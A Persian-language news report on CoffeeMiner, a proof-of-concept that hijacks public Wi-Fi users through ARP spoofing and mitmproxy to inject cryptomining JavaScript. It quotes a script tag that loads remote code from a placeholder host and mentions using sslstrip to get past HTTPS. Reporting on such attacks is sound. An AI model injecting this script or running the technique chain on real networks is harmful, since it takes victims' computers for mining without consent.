خلاصه: توسعهدهندهای به نام Arnau یک پروژهی اثبات مفهومی بهنام CaffeeMiner را منتشر کرده است. این پروژه برای هک شبکههای عمومی وایوای برای تزریق کد استخراج ارزمجازی به نشستها ایجاد شده است و با جعل پیامهای ARP بر روی شبکهی محلی به منظور جدا کردن ترافیک از دستگاههای دیگر روی شبکه کار میکند.
افزایش چشمگیر ارزش بیتکوین، نظر هکرها و متقلبان را بهسمت اتخاذ هر روشی برای سرقت کیف پولهای مجازی یا منابع محاسباتی از قربانیان جلب کرده است.
توسعهدهندهای به نام Arnau یک پروژهی اثبات مفهومی بهنام CaffeeMiner را منتشر کرده است. این پروژه برای هک شبکههای عمومی وایوای برای تزریق کد استخراج ارزمجازی به نشستها ایجاد شده است.
به گفتهی کارشناسان این پروژه الهامگرفته از مورد Starbucks است که در آن هکرها از عملیات hijack علیه لپتاپهای متصل به شبکهی وایفای استفاده میکردند تا از قدرت محاسباتی دستگاهها برای استخراج ارزمجازی بهرهبرداری کنند.
Arnau توضیح دادهاست که چگونه با یک حملهی مردمیانی میتوان کد جاوااسکریپت در صفحات HTMLی که کاربر متصل شده، به آنها دست مییابد تزریق کرد. در این روش همهی دستگاهها متصل شده به شبکهی وایفای مجبور به استخراج یک ارزمجازی میشوند.
CoffeeMiner با جعل پیامهای ARP بر روی شبکهی محلی به منظور جدا کردن ترافیک از دستگاههای دیگر روی شبکه کار میکند.
حملهی مرد میانی با استاده از نرمافزار mitmproxy انجام میشود که امکان تزریق خط کد HTML زیر به ترافیک رمزنشدهی مرتبط با محتوای درخواست شوده توسط کاربر بر روی شبکه را میدهد:
<script src="http://httpserverIP:8000/script.js" type="text/javascript"></script>
هنگامی که مرورگر کاربر صفحات را با کد تزریق شده بارگذاری میکند، کد جاوااسکریپت اجرا میگردد و از CPU برای تولید Monero با استفاده از نرمافزار استخراج ارزمجازی CoinHive سوءاستفاده میکند.
CoffeeMiner منتشرشده توسط این محقق با HTTPS کار نمیکند، اما این محدودیت میتواند با sslstrip کنار زده شود.
Arnau این پروژه را در گیتهاب منتش کرده است.